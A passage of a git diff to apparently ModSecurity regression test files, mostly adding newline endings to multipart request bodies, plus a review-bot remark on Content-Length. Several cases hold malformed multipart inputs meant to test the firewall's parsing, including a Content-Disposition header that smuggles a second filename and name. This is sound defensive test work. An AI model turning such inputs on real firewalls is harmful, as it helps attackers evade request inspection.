@@ -1754,25 +1754,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ 
@@ -1864,25 +1864,25 @@
 "uri":"/wheee/f%20i%20l%20e%20",
 "method":"POST",
 "body":[
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name2\"",
- "",
- "test2",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "----------------------------756b6d74fa1a8ee2--"
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name2\"\n",
+ "\n",
+ "test2\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "expected":{
@@ -1919,25 +1919,25 @@
 "uri":"/wheee/f%20i%20l%20e%20",
 "method":"POST",
 "body":[
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name\"",
- "",
- "test",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"name2\"",
- "",
- "test2",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"",
- "Content-Type: text/plain",
- "",
- "This is a very small test file..",
- "----------------------------756b6d74fa1a8ee2",
- "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ",
- "Content-Type: text/plain",
- "",
- "This is another very small test file..",
- "----------------------------756b6d74fa1a8ee2--"
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name2\"\n",
+ "\n",
+ "test2\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
 ]
 },
 "expected":{
diff --git a/test/test-cases/regression/operator-fuzzyhash.json b/test/test-cases/regression/operator-fuzzyhash.json
index 2250ebe2d4..56e4b505cd 100644
--- a/test/test-cases/regression/operator-fuzzyhash.json
+++ b/test/test-cases/regression/operator-fuzzyhash.json
@@ -23,68 +23,68 @@ "uri":"/", "method":"POST", "body": [ -"", -"# -- Rule engine initialization ----------------------------------------------", -"", -"# Enable ModSecurity, attaching it to every transaction. Use detection", -"# only to start with, because that minimises the chances of post-installation", -"# disruption.", -"#", -"SecRuleEngine DetectionOnly", -"", -"", -"# -- Request body handling ---------------------------------------------------", -"", -"# Allow ModSecurity to access request bodies. If you don't, ModSecurity", -"# won't be able to see any POST parameters, which opens a large security", -"# hole for attackers to exploit.", -"#", -"SecRequestBodyAccess On", -"", -"", -"# Enable XML request body parser.", -"# Initiate XML Processor in case of xml content-type", -"#", -"SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\", -" \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"", -"", -"# Enable JSON request body parser.", -"# Initiate JSON Processor in case of JSON content-type; change accordingly", -"# if your application does not use 'application/json'", -"#", -"SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\", -" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", -"", -"# Maximum request body size we will accept for buffering. If you support", -"# file uploads then the value given on the first line has to be as large", -"# as the largest file you are willing to accept. The second value refers", -"# to the size of data, with files excluded. You want to keep that value as", -"# low as practical.", -"#", -"SecRequestBodyLimit 13107200", -"SecRequestBodyNoFilesLimit 131072", -"", -"# Store up to 128 KB of request body data in memory. When the multipart", -"# parser reachers this limit, it will start using your hard disk for", -"# storage. 
That is slow, but unavoidable.", -"#", -"SecRequestBodyInMemoryLimit 131072", -"", -"# What do do if the request body size is above our configured limit.", -"# Keep in mind that this setting will automatically be set to ProcessPartial", -"# when SecRuleEngine is set to DetectionOnly mode in order to minimize", -"# disruptions when initially deploying ModSecurity.", -"#", -"SecRequestBodyLimitAction Reject", -"", -"# Verify that we've correctly processed the request body.", -"# As a rule of thumb, when failing to process a request body", -"# you should reject the request (when deployed in blocking mode)", -"# or log a high-severity alert (when deployed in detection-only mode).", -"#", -"SecRule REQBODY_ERROR \"!\\@eq 0\" ", -"\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"", -" " +"\n", +"# -- Rule engine initialization ----------------------------------------------\n", +"\n", +"# Enable ModSecurity, attaching it to every transaction. Use detection\n", +"# only to start with, because that minimises the chances of post-installation\n", +"# disruption.\n", +"#\n", +"SecRuleEngine DetectionOnly\n", +"\n", +"\n", +"# -- Request body handling ---------------------------------------------------\n", +"\n", +"# Allow ModSecurity to access request bodies. 
If you don't, ModSecurity\n", +"# won't be able to see any POST parameters, which opens a large security\n", +"# hole for attackers to exploit.\n", +"#\n", +"SecRequestBodyAccess On\n", +"\n", +"\n", +"# Enable XML request body parser.\n", +"# Initiate XML Processor in case of xml content-type\n", +"#\n", +"SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\\n", +" \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"\n", +"\n", +"# Enable JSON request body parser.\n", +"# Initiate JSON Processor in case of JSON content-type; change accordingly\n", +"# if your application does not use 'application/json'\n", +"#\n", +"SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\\n", +" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"\n", +"\n", +"# Maximum request body size we will accept for buffering. If you support\n", +"# file uploads then the value given on the first line has to be as large\n", +"# as the largest file you are willing to accept. The second value refers\n", +"# to the size of data, with files excluded. You want to keep that value as\n", +"# low as practical.\n", +"#\n", +"SecRequestBodyLimit 13107200\n", +"SecRequestBodyNoFilesLimit 131072\n", +"\n", +"# Store up to 128 KB of request body data in memory. When the multipart\n", +"# parser reachers this limit, it will start using your hard disk for\n", +"# storage. 
That is slow, but unavoidable.\n", +"#\n", +"SecRequestBodyInMemoryLimit 131072\n", +"\n", +"# What do do if the request body size is above our configured limit.\n", +"# Keep in mind that this setting will automatically be set to ProcessPartial\n", +"# when SecRuleEngine is set to DetectionOnly mode in order to minimize\n", +"# disruptions when initially deploying ModSecurity.\n", +"#\n", +"SecRequestBodyLimitAction Reject\n", +"\n", +"# Verify that we've correctly processed the request body.\n", +"# As a rule of thumb, when failing to process a request body\n", +"# you should reject the request (when deployed in blocking mode)\n", +"# or log a high-severity alert (when deployed in detection-only mode).\n", +"#\n", +"SecRule REQBODY_ERROR \"!\\@eq 0\" \n", +"\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"\n", +" \n" ] }, "response":{ diff --git a/test/test-cases/regression/request-body-parser-multipart-crlf.json b/test/test-cases/regression/request-body-parser-multipart-crlf.json index 8d49c79606..2e4c001f7d 100644 --- a/test/test-cases/regression/request-body-parser-multipart-crlf.json +++ b/test/test-cases/regression/request-body-parser-multipart-crlf.json 
@@ -24,21 +24,21 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "1.1\r",
- "1.2\r",
- "1.3\r",
- "-----------------------------69343412719991675451336310646",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "2.1\r",
- "2.2\r",
- "2.3\r",
- "-----------------------------69343412719991675451336310646--"
+ "-----------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "1.1\r\n",
+ "1.2\r\n",
+ "1.3\r\n",
+ "-----------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "2.1\r\n",
+ "2.2\r\n",
+ "2.3\r\n",
+ "-----------------------------69343412719991675451336310646--\n"
 ]
 },
 "response":{
diff --git a/test/test-cases/regression/request-body-parser-multipart.json b/test/test-cases/regression/request-body-parser-multipart.json
index 4e25168e36..1c5586fcf7 100644
--- a/test/test-cases/regression/request-body-parser-multipart.json
+++ b/test/test-cases/regression/request-body-parser-multipart.json
@@ -23,20 +23,20 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA\r\n",
+ "--0000--\r\n"
 ]
 },
 "response":{
@@ -84,15 +84,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -119,7 +119,7 @@
 {
 "enabled":1,
 "version_min":300000,
- "title":"multipart parser (no final CRLF) - FIXME: test suit cannot work without the ending \\n",
+ "title":"multipart parser (no final CRLF)",
 "client":{
 "ip":"200.249.12.31",
 "port":123
@@ -140,15 +140,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--"
 ]
 },
 "response":{
@@ -196,15 +196,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--------------------------------------------------boundary\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "--------------------------------------------------boundary\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "--------------------------------------------------boundary--\r"
+ "--------------------------------------------------boundary\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "--------------------------------------------------boundary\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "--------------------------------------------------boundary--\r\n"
 ]
 },
 "response":{
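Review bot: In the hunk at -140 the last body element now ends at `--` with neither CR nor LF, so the request body of the "no final CRLF" case is two bytes shorter than before, while that case's `Content-Length` header sits above the hunk and is not touched by it. If the harness or any rule in this case reads that header, or a length variable derived from the body, it is worth confirming that the declared value still matches the bytes actually sent. The commit message also cites a body ending in a bare `\r`; a sibling case whose final element is `"-----------------------------69343412719991675451336310646--\r"` would pin that second edge for the multipart parser.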
@@ -252,15 +252,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "----------0xKhTmLbOuNdArY\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "----------0xKhTmLbOuNdArY\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "----------0xKhTmLbOuNdArY--\r"
+ "----------0xKhTmLbOuNdArY\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "----------0xKhTmLbOuNdArY\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "----------0xKhTmLbOuNdArY--\r\n"
 ]
 },
 "response":{
@@ -308,16 +308,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "--test\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "--\r",
- "-----------------------------69343412719991675451336310646--\r"
-
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "--test\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "--\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -364,14 +363,14 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n"
 ]
 },
 "response":{
@@ -417,13 +416,13 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -469,15 +468,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -523,15 +522,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -577,17 +576,17 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- ":\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ ":\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -633,17 +632,17 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- " name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- " name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -691,17 +690,17 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- " name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- " name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -749,16 +748,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- " name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ " name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -806,16 +805,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- "\fname=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\fname=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -863,16 +862,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data;\r",
- "\f\tname=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data;\r\n",
+ "\f\tname=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -920,16 +919,16 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646--\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"b\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"b\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -975,16 +974,15 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=\"a\"\r",
- "\r",
- "1\r",
- "-----------------------------69343412719991675451336310646\r",
- "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r",
- "\r",
- "2\r",
- "-----------------------------69343412719991675451336310646--\r"
-
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=\"a\"\r\n",
+ "\r\n",
+ "1\r\n",
+ "-----------------------------69343412719991675451336310646\r\n",
+ "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n",
+ "\r\n",
+ "2\r\n",
+ "-----------------------------69343412719991675451336310646--\r\n"
 ]
 },
 "response":{
@@ -1578,20 +1576,20 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
- "Content-Type: image/jpeg\r",
- "\r",
- "BINARYDATA\r",
- "--0000--\r"
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA\r\n",
+ "--0000--\r\n"
 ]
 },
 "response":{
@@ -1618,7 +1616,7 @@
 {
 "enabled":1,
 "version_min":300000,
- "title":"multipart parser (boundary special char - trailing exclamation+token)",
+ "title":"multipart parser (boundary special char - trailing exclamation+token)",
 "client":{
 "ip":"200.249.12.31",
 "port":123
@@ -1633,7 +1631,7 @@
 "User-Agent":"curl/7.38.0",
 "Accept":"*/*",
 "Content-Length":"330",
- "Content-Type":"multipart/form-data;boundary=0000!1111",
+ "Content-Type":"multipart/form-data;boundary=0000!1111",
 "Expect":"100-continue"
 },
 "uri":"/",
@@ -1850,7 +1848,7 @@
 },
 "expected":{
 "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
+ "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
 },
 "rules":[
 "SecRuleEngine On",
@@ -1911,7 +1909,7 @@
 },
 "expected":{
 "http_code": 403,
- "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
+ "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted."
 },
 "rules":[
 "SecRuleEngine On",
@@ -2249,30 +2247,30 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Disposition: attachment\r",
- "Content-Type: multipart/mixed; boundary=BbC04y\r",
- "\r",
- "--BbC04y\r",
- "Content-Disposition: file; filename=\"file1.txt\"\r",
- "Content-Type: text/plain\r",
- "\r",
- "... contents of file1.txt ...\r",
- "--BbC04y\r",
- "Content-Disposition: file; filename=\"file2.gif\r",
- "Content-Type: image/jpeg\r",
- "Content-Transfer-Encoding: binary\r",
- "\r",
- "...contents of file2.gif...\r",
- "--0000--\r"
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: attachment\r\n",
+ "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
+ "\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file1.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "... contents of file1.txt ...\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file2.gif\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "Content-Transfer-Encoding: binary\r\n",
+ "\r\n",
+ "...contents of file2.gif...\r\n",
+ "--0000--\r\n"
 ]
 },
 "response":{
@@ -2320,29 +2318,29 @@
 "uri":"/",
 "method":"POST",
 "body":[
- "--0000\r",
- "Content-Disposition: form-data; name=\"name\"\r",
- "\r",
- "Brian Rectanus\r",
- "--0000\r",
- "Content-Disposition: form-data; name=\"email\"\r",
- "\r",
- "brian.rectanus@breach.com\r",
- "--0000\r",
- "Content-Type: multipart/mixed; boundary=BbC04y\r",
- "\r",
- "--BbC04y\r",
- "Content-Disposition: file; filename=\"file1.txt\"\r",
- "Content-Type: text/plain\r",
- "\r",
- "... contents of file1.txt ...\r",
- "--BbC04y\r",
- "Content-Disposition: file; filename=\"file2.gif\r",
- "Content-Type: image/jpeg\r",
- "Content-Transfer-Encoding: binary\r",
- "\r",
- "...contents of file2.gif...\r",
- "--0000--\r"
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
